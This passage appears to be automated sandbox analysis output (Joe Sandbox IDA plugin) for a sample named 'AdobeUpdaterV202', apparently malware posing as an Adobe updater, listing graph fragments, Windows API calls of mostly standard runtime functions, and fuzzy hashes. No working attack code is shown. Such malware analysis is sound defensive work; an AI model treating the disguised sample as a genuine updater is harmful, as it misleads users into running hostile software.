ea1831-ea1833 381->386 388 ea1928-ea192e 383->388 389 ea1984-ea198f GetLastError 383->389 384->378 390 ea18c2-ea18c6 384->390 386->367 392 ea1835-ea1858 386->392 397 ea18f2-ea18fc call e9ed98 387->397 388->389 395 ea1930 388->395 393 ea19a8-ea19ab 389->393 394 ea1991-ea19a3 call e9b0d8 call e9b0c5 389->394 390->383 396 ea18c8-ea18e0 ReadConsoleW 390->396 392->367 400 ea185a-ea1870 392->400 406 ea18e8-ea18ee call e9b07e 393->406 407 ea19b1-ea19b3 393->407 394->387 403 ea1933-ea1945 395->403 404 ea18e2 GetLastError 396->404 405 ea1901-ea190a 396->405 397->346 398->364 399->387 400->367 410 ea1872-ea1874 400->410 403->397 413 ea1947-ea194b 403->413 404->406 405->403 406->387 407->397 410->367 417 ea1876-ea188d 410->417 420 ea194d-ea195d call ea1356 413->420 421 ea1964-ea1971 413->421 417->367 432 ea1960-ea1962 420->432 426 ea197d-ea1982 call ea11ae 421->426 427 ea1973 call ea14ad 421->427 433 ea1978-ea197b 426->433 427->433 432->397 433->432
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3907804496
                                  • Opcode ID: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
                                  • Instruction ID: 66c19a5b8186f07b76af97f737ad56503cb0ffd439e31218692ec8f31ef70a80
                                  • Opcode Fuzzy Hash: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
                                  • Instruction Fuzzy Hash: C7B1EF74A04249AFDB15DF98D880BBEBBF5BF8B304F149199E550BF292C770A941CB60
                                  APIs
                                  • GetCPInfo.KERNEL32(008E9028,008E9028,?,7FFFFFFF,?,00EA9B89,008E9028,008E9028,?,008E9028,?,?,?,?,008E9028,?), ref: 00EA995F
                                  • __alloca_probe_16.LIBCMT ref: 00EA9A1A
                                  • __alloca_probe_16.LIBCMT ref: 00EA9AA9
                                  • __freea.LIBCMT ref: 00EA9AF4
                                  • __freea.LIBCMT ref: 00EA9AFA
                                  • __freea.LIBCMT ref: 00EA9B30
                                  • __freea.LIBCMT ref: 00EA9B36
                                  • __freea.LIBCMT ref: 00EA9B46
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$Info
                                  • String ID:
                                  • API String ID: 127012223-0
                                  • Opcode ID: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
                                  • Instruction ID: d6cccf7f4179006bb7e741b3f9ab6b8a7e253ca18f375fd2d4a0dbc8e547a602
                                  • Opcode Fuzzy Hash: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
                                  • Instruction Fuzzy Hash: 7971B3729002096BDF219A649C82FAF77E9DF8F318F252059E815BF292D735AD01C764
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00E942E3
                                  • __alloca_probe_16.LIBCMT ref: 00E9430F
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00E9434E
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E9436B
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00E943AA
                                  • __alloca_probe_16.LIBCMT ref: 00E943C7
                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E94409
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00E9442C
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                  • String ID:
                                  • API String ID: 2040435927-0
                                  • Opcode ID: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
                                  • Instruction ID: ee326f976f351e4463ddcd7406c4873eee018c4cfeaecfdfee75d0f232b7be38
                                  • Opcode Fuzzy Hash: a8c5fdb113358540eb88ee1d9615bd49dce463e3225d6b52d06c17aa9a75ab86
                                  • Instruction Fuzzy Hash: 9F518DB250020AAFEF209F64CC85FAF7BBAEF44759F155125FD15B6190D7309C128BA0
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00E976B7
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00E976BF
                                  • _ValidateLocalCookies.LIBCMT ref: 00E97748
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00E97773
                                  • _ValidateLocalCookies.LIBCMT ref: 00E977C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
                                  • Instruction ID: 0d5a44efc33d6a11f7265c2f08a3bb553b5d8445da63f80ce4513e1a864e8af3
                                  • Opcode Fuzzy Hash: 212ba3d15d96aae7ed39f5ddc8215b54c407e7ab759ef0c2f0ec8cbc5dd2f6c4
                                  • Instruction Fuzzy Hash: 3641C334A142199FCF10DFA8CC85A9E7BF1BF46315F149096E854BB392D731AD09CB90
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E920FA
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E92104
                                  • int.LIBCPMT ref: 00E9211B
                                    • Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
                                    • Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E
                                  • codecvt.LIBCPMT ref: 00E9213E
                                  • std::_Facet_Register.LIBCPMT ref: 00E92155
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E92175
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E92182
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                  • String ID:
                                  • API String ID: 2133458128-0
                                  • Opcode ID: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
                                  • Instruction ID: c7a1a1dd01ed935090d53fff52c4178ea93c6eb337942c61fe89ceb05fdc7196
                                  • Opcode Fuzzy Hash: 631ac4dd8291474176b93c27c3091ba7503135ef2a1ec348e8ff0578a2ae8869
                                  • Instruction Fuzzy Hash: EB01CC75901219ABCF05EBA4C816AAEB7A6BF84714F24550DF6107B292DFB09E06DB80
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E9218F
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E92199
                                  • int.LIBCPMT ref: 00E921B0
                                    • Part of subcall function 00E92653: std::_Lockit::_Lockit.LIBCPMT ref: 00E92664
                                    • Part of subcall function 00E92653: std::_Lockit::~_Lockit.LIBCPMT ref: 00E9267E
                                  • ctype.LIBCPMT ref: 00E921D3
                                  • std::_Facet_Register.LIBCPMT ref: 00E921EA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E9220A
                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E92217
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                  • String ID:
                                  • API String ID: 2958136301-0
                                  • Opcode ID: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
                                  • Instruction ID: 91728cdd243ddeab66470ca811867104f4ec1010a30df09e26884fa2be5f5f50
                                  • Opcode Fuzzy Hash: 283e1cf5dd67dd36751f8c791565e7c8611ca8b02248a9161dbb5b581278647f
                                  • Instruction Fuzzy Hash: 9E01DE7590011AABCF05EBA0C806ABEB7F5BF84714F24140DE5107B2E2DFB09E05DB91
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00E97871,00E95E40,00E94F12), ref: 00E97888
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E97896
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E978AF
                                  • SetLastError.KERNEL32(00000000,00E97871,00E95E40,00E94F12), ref: 00E97901
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
                                  • Instruction ID: f6972bd55d8e0f02485ad70eff497f6d264fa5713332d5992deaa56a814f47d6
                                  • Opcode Fuzzy Hash: d8ac672223cf029f9f391a8f1826e9ed333e98190f204624b6d868c5b31a7dc0
                                  • Instruction Fuzzy Hash: 1201F53232C2265EEEB82778AC8D59A3A94FF023B5730222EF420711E1EF514C19A194
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DFBDDF9F,?,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C174
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E9C186
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00EAB0F9,000000FF,?,00E9C0CF,?,?,00E9C0A3,00000000), ref: 00E9C1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
                                  • Instruction ID: bb6b09f96bef3c88e57e23191e3fb0e6d7a9d2adabeaad535894d1db3088787c
                                  • Opcode Fuzzy Hash: 9e229afa4fc9a4470e47be03d561758e96cc23e5629a0179a35073cb1312d854
                                  • Instruction Fuzzy Hash: 0001D671A44759FFDB119F92DC49FAEBBB9FB49B14F000125F812B26E0DB74A804CA90
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00EA2A68
                                  • __alloca_probe_16.LIBCMT ref: 00EA2B29
                                  • __freea.LIBCMT ref: 00EA2B90
                                    • Part of subcall function 00EA1DC1: HeapAlloc.KERNEL32(00000000,00E91FA6,?,?,00E957EA,?,?,?,00000000,?,00E917E2,00E91FA6,?,?,?,?), ref: 00EA1DF3
                                  • __freea.LIBCMT ref: 00EA2BA5
                                  • __freea.LIBCMT ref: 00EA2BB5
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                  • String ID:
                                  • API String ID: 1096550386-0
                                  • Opcode ID: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
                                  • Instruction ID: f21556953c3f8fd1f0d1f7f7cf5021f05883ed1c0520c5149daa706a90068683
                                  • Opcode Fuzzy Hash: 262cbc630ecd011e40cbb978b0bc4be5d0e54ed5acc6107064434bcfd49b5395
                                  • Instruction Fuzzy Hash: B251B172600216ABEF249E68CC81EBB3BE9EF4A714B15156CFE04FA250E731ED108760
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E93BD6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E93BE1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00E93C4F
                                    • Part of subcall function 00E93D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00E93D4A
                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00E93BFC
                                  • _Yarn.LIBCPMT ref: 00E93C12
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                  • String ID:
                                  • API String ID: 1088826258-0
                                  • Opcode ID: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
                                  • Instruction ID: ad467c95ae187b574e469a0cba65983ef70841170de1555fa9eba367979a8733
                                  • Opcode Fuzzy Hash: 809b95c57fe1593d251b20f8fba7608a82ced9547860faeb987fec05f62fbbef
                                  • Instruction Fuzzy Hash: A601BCB5A011159BCF0AEB30C85593CBBB5BF99740B141009E80277391CF74AF02DB85
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BA6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0BB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: $
                                  • API String ID: 885266447-2088381004
                                  • Opcode ID: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
                                  • Instruction ID: 99016b8ebf2c8504ef4e6be0c4a090a0898f86758066c096f274c117c69e6c97
                                  • Opcode Fuzzy Hash: f5204038756f00fa8ba6baa6557752d8a6f12e633af3e82672063c613825e01c
                                  • Instruction Fuzzy Hash: B7515071A00249AFCF14CF98C991EEEBBB2EB4E358F149159E955AB351D330AE41CB60
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00E92398
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00E923A5
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00E923E2
                                    • Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93CEC
                                    • Part of subcall function 00E93CCD: _Yarn.LIBCPMT ref: 00E93D10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 482894088-1405518554
                                  • Opcode ID: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
                                  • Instruction ID: 3be9b361b0d64d8e7ca3b2d819bf692db5bacc8592bf837a4f9b67e70ecaff5a
                                  • Opcode Fuzzy Hash: fcf6b5267e7e202a555d2c9f44c868e3de55b8ae9aa633b8caeced8c7c0fabaf
                                  • Instruction Fuzzy Hash: 3E0180715057849FCB309FAA948158AFEE0BF29350750996FE18DA7B02C770A600CBA9
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000800,?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue), ref: 00E989CF
                                  • GetLastError.KERNEL32(?,00E98973,00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D), ref: 00E989D9
                                  • LoadLibraryExW.KERNEL32(00EB4FF0,00000000,00000000,?,00EB4FF0,?,?,?,00E916D9,?,00E916D9,?), ref: 00E98A01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID: api-ms-
                                  • API String ID: 3177248105-2084034818
                                  • Opcode ID: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
                                  • Instruction ID: 31fd68b75579fa293d3592454813e49ae0ad0d5cb65f2e3f8243dd5abbac5ceb
                                  • Opcode Fuzzy Hash: 84ce26be4dcc0660c851b7e5e8562f95cae44515eaec31e0b4352ce1ccaa0cd0
                                  • Instruction Fuzzy Hash: C5E04870244344BFEF105F62DE46B583E569F17B54F145021FA0DF84F1EBA1E8558584
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(DFBDDF9F,00000000,00000000,00000000), ref: 00E9FBF1
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9FE4C
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E9FE94
                                  • GetLastError.KERNEL32 ref: 00E9FF37
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
                                  • Instruction ID: 9c2bfa02b2f389c3bd55a233e39d1ff2d01f433db526e39ad25b82547affd2a1
                                  • Opcode Fuzzy Hash: b41360838bc8659674034152e40ecd5ca63bdc2f158d22179df145c0c382c0f5
                                  • Instruction Fuzzy Hash: 26D146B5E102489FCF15CFA8D880AEDBBB5FF09314F18856AE855FB251DB30A942CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
                                  • Instruction ID: 0c3b67a63ff3185d88dc2aeb0f5db1604c564f7db920e83457e4bd7c9e4437b6
                                  • Opcode Fuzzy Hash: a727e4805c7e572793a6957c6b3ce4900fb1ff0754272355039a35bb5d1bef4c
                                  • Instruction Fuzzy Hash: 24511472618602AFDF298F55C841BBE77A1FF40314F18212DE88177291E7B0EE88C790
                                  APIs
                                    • Part of subcall function 00EA3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00EA2B86,?,00000000,-00000008), ref: 00EA3CA0
                                  • GetLastError.KERNEL32 ref: 00EA4074
                                  • __dosmaperr.LIBCMT ref: 00EA407B
                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00EA40B5
                                  • __dosmaperr.LIBCMT ref: 00EA40BC
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
                                  • Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 1913693674-0
                                  • Opcode ID: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
                                  • Instruction ID: 8dd3020a7f8f4995fd50c96739f1cd520e9f373256de9073a9dd46602ca9ca56
                                  • Opcode Fuzzy Hash: 58b0d9051673a7034df07c333ef70170f666d749418cd7a2ddbed93ae0001ffe
                                  • Instruction Fuzzy Hash: BC21D8B1600305AFCB20AF719DC186BB7EDEF8A3647009518FA25BB591D7B1FC509752
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true
